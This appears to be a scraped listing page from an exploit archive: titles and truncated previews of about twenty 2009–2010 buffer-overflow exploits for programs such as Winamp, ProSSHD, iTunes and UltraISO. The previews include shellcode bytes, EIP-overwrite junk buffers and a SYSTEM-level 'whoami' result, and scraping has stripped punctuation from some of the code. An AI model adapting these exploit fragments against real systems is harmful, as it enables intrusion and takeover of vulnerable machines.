Winamp 5.572 whatsnew.txt SEH (meta)

Exploit for windows platform in category local exploits ==================================== Winamp 5.572 whatsnew.txt SEH meta ==================================== Title: Winamp 5.572 whatsnew.txt SEH MSF Author: Blake Published: 2010-04-15 Tested on Windows XP SP3 This file is part of the...

PHP 6.0 Dev str_transliterate() Buffer Overflow

whoami whoami nt authority\system / errorreporting0; $bases = $GET'poss'; $basee = $GET'pose'; $offs = $GET'offs'; $offe = $GET'offe'; ifinigetbool'unicode.semantics' $buff = strrepeat"\u4141", 32; $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM $ptw = "\u2FE0\u6EE5"; // 6EE52FE0...

Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC)

!/usr/bin/python Mocha LPD v1.9 Remote Heap Overflow Exploit ol skool 'write 4' whoops, I said it was a DoS. My bad. btw yes, I know its 2010 :0 CVE: 2010-1687 tested on XP sp1 use anti debugging to see it work - !hidedebug zwqueryinformationprocess call trace: ntdll.RtlAllocateHeap Called...

Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit

No description provided by source. include stdio.h include stdlib.h include string.h include sys/socket.h include netinet/in.h // // EasyFtp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // 11470x90c.c // // Date: 24/03/2010 // Author: x90c x90c.org // // Discovered by: loneferret //...

Yahoo Player 1.0 - '.m3u' Local Buffer Overflow

Title: Yahoo Player v1.0 .m3u Buffer Overflow Exploit direct EIP overwrite Date: 2010-03-07 Author: BombardMr. tro0oqy originally discovered it, and gave a SEH Version:1.0 Tested on: Windows XP SP2 CVE: my $file="crash.m3u"; my $junkA="A"x2080; my $eip=pack'V',0x7c80ae31; eip my $junkC="C"x12;...

ProSSHD v1.2 20090726 Buffer Overflow Exploit

No description provided by source. Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX 7C90EB94 ntdll.KiFastSystemCallRet EBX 00000674 ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..." EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..." ESI 7C81DD9A...

ProSSHD v1.2 20090726 Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ============================================= ProSSHD v1.2 20090726 Buffer Overflow Exploit ============================================= Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX...

ProSSHD 1.2 20090726 - Remote Buffer Overflow

ProSSHD 1.2 20090726 - Remote Buffer Overflow Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX 7C90EB94 ntdll.KiFastSystemCallRet EBX 00000674 ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..." EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..." ESI 7C81DD9A...

Media Player Classic 6.4.9.1 Buffer Overflow

!/usr/bin/perl Media Player Classic 6.4.9.1 .avi Buffer Overflow Exploit Homepage: http://www.sourceforge.net/projects/guliverkli2/ Exploit Coded by: cr4wl3r From: Indonesia WARNING - WARNING - WARNING - WARNING Disclaimer: The author published the information under the condition that is not in t...

Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow

Exploit Title: iTunes .pls file handling buffer overflow Date: 2009.12.20 Author: S2 Crew Hungary Software Link: - Version: 9.0 Tested on: OSX 10.5.8, Windows XP SP2 /GS flag, DOS CVE: CVE-2009-2817 Code: !/usr/bin/env ruby SETJMP = 0x92F04224 JMPBUF = 0x8fe31290 STRDUP = 0x92EED110 8fe24459 jmp...

OtsTurntables Free 1.00.047 - .olf Universal Buffer Overflow

OtsTurntables Free 1.00.047 - .olf Universal Buffer Overflow !/usr/bin/python OtsTurntables Free v1.00.047 .olf Universal Buffer Overflow Exploit Date: 14-01-2010 Author: mrme Software Link: http://www.otsturntables.com/download-otsturntables-free/ Version: 1.00.047 Tested on: Windows XP sp3...

Ollydbg 2.00 Beta1 - Local Buffer Overflow

Exploit Title: Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit Date: 2010-02-15 Author: SuBz3r0 Software Link: http://www.ollydbg.de/version2.html Version: 2.00 Beta 1 Tested on: XP SP3 CVE : if exists Code : Ollydbg2 v2.00 beta1 Exploit in Python print "" print "" print " SuBz3r0 " print "" pri...

UltraISO 9.3.6.2750 Local Buffer Overflow POC (0day)

Exploit for unknown platform in category dos / poc ==================================================== UltraISO 9.3.6.2750 Local Buffer Overflow POC 0day ==================================================== /ccd overflow string=10974 bytes img file size=109974 bytes ccd file size=11812 / include...

UltraISO 9.3.6.2750 Local Buffer Overflow Exploit (0day)

Exploit for unknown platform in category local exploits ======================================================== UltraISO 9.3.6.2750 Local Buffer Overflow Exploit 0day ======================================================== / Ultraiso local buffer overflow exploit0day This 0day is kickass from f...

Core-FTP-Server

The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked, resulting in control of the instruction pointer, allowing for arbitrary code injection. sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"...

Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)

Exploit for unknown platform in category local exploits ===================================================================== Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit Universal ===================================================================== / Deepburner pro 1.9.0.228 dbr fi...

PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow

/============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || || ==============================================================================/ //Exploit Title: PlayMeNow...

SimplePlayer 0.2 Denial Of Service

!/usr/bin/python Title: SimplePlayer v0.2 0day .wav overflow DOS Exploit Found by: mrme seeleymagic at hotmail dot com Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT Tested on: Windows XP SP3 Happy New Year! POC: crash = "x41" 36000; overwrite the buffer at 262 bytes tr...

Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow

/ riptheministreamripper.c Mini-stream ripper = 3.0.1.1 .pls Local Universal Buffer Overflow Exploit exploited by: mrme Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r Visit: corelanc0d3r's blog http://www.corelan.be:8800/ reference:...

Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit

No description provided by source. / riptheministreamripper.c Mini-stream ripper = 3.0.1.1 .pls Local Universal Buffer Overflow Exploit exploited by: mrme Greetz to the Corlan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r Visit: corelanc0d3r's blog...